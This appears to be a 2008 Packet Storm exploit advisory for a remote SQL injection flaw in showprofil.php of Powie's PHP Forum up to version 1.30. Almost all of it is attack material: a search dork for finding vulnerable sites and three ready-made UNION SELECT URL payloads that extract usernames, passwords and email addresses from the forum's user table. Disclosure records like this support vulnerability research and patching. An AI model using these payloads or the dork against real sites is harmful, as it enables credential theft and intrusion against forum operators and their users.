pforum-sql.txt

2008-09-12T00:00:00
ID PACKETSTORM:69932
Type packetstorm
Reporter tmh
Modified 2008-09-12T00:00:00

Description

                                        
                                            `#=====================================================================================================  
#Powie's PHP Forum <= v1.30 (showprofil) Remote SQL Injection Exploit  
#=====================================================================================================  
#  
#Critical Level : Dangerous  
#  
#Venedor site : http://www.powie.de  
#  
#Version : v1.30  
#  
#=====================================================================================================  
#  
#DORK : "pForum 1.30"  
#  
#  
#Exploit :  
#--------------------------------  
#  
#FOR USER: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,username)+FROM+pfuser+limit+1,1--  
#FOR PASS: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,pwd)+FROM+pfuser+limit+1,1--  
#FOR MAIL: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,emai)+FROM+pfuser+limit+1,1--  
#  
#=====================================================================================================  
#Discoverd By : -tmh-  
#  
#Contact : tmh[at]sys-flaw.com  
#  
#Greetz To : n00bor , Five-Three-Nine , J0hn.X3r , electron1x , meckl, Floo , -Patrick_B ,  
# Loader007 , bizzit , Sys-Flaw , Codesoft , Free-Hack abcdef ,  
#  
#  
#=====================================================================================================  
  
  
`